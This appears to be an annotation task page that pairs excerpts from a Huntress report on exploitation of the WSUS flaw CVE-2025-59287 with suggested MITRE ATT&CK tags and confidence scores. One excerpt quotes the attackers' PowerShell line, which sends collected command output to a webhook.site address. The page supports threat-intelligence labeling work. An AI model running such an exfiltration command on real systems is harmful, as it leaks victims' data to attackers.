“…-update-agent-200. During tactical response engagements to active exploitation, Huntress noted the use of proxy networks being leveraged to conduct exploitation. Attacker tradecraft. Beginning at around 2025-10-23 23:34 UTC, alerts were triggered for suspicious activity.…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
T1059.001 PowerShell (79%)
“…a deserialization RCE against the update service. - Exploitation activity included spawning Command Prompt and PowerShell via the HTTP worker process and WSUS service binary (process chains observed): - wsusservice.exe → cmd.exe → cmd.exe → powershell.exe - w3wp.exe → cmd…”
T1068 Exploitation for Privilege Escalation (52%)
“Exploitation of Windows Server Update Services Remote Code | Huntress. Acknowledgments: special thanks to Luke Wilkinson, Joshua Kiriakoff, and Jordan Sexton for their contributions to this investigation and writeup. TL;DR: Huntress has observed threat actors exploiting a Micr…”
T1059.007 JavaScript (49%)
“…by a threat actor to run a deserialized attack against the AuthorizationCookie, known as CVE-2025-59287 (https://nvd.nist.gov/vuln/detail/CVE-2025-59287). The blog by Hawktrace ("CVE-2025-59287 — WSUS Unauthenticated Remote Code Execution" (https://…”
T1190 Exploit Public-Facing Application (40%)
“…thrown by the target of an invocation. Error WsusService.9 HmtWebServices.CheckReportingWebService Reporting WebService WebException: System.Net.WebException: Unable to connect to the remote server. C:\inetpub\logs\LogFiles\W3SVC*\u_ex*.log POST /ReportingWebSe…”
T1190 Exploit Public-Facing Application (34%)
“…} | Out-String) + $error } catch { $_.ToString() }; $w = "http://webhook.site/[redacted]"; try { iwr -UseBasicParsing -Uri $w -Body $r -Method PUT } catch { curl.exe -k $w --data-binary $r } Figure 2: w3wp.exe → cmd.exe → cmd.exe → powershe…”
T1055.001 Dynamic-link Library Injection (33%)
“…a deserialization RCE against the update service. - Exploitation activity included spawning Command Prompt and PowerShell via the HTTP worker process and WSUS service binary (process chains observed): - wsusservice.exe → cmd.exe → cmd.exe → powershell.exe - w3wp.exe → cmd…”
Summary
Huntress has observed threat actors exploiting a Microsoft Windows Server Update Services (WSUS) vulnerability (CVE-2025-59287).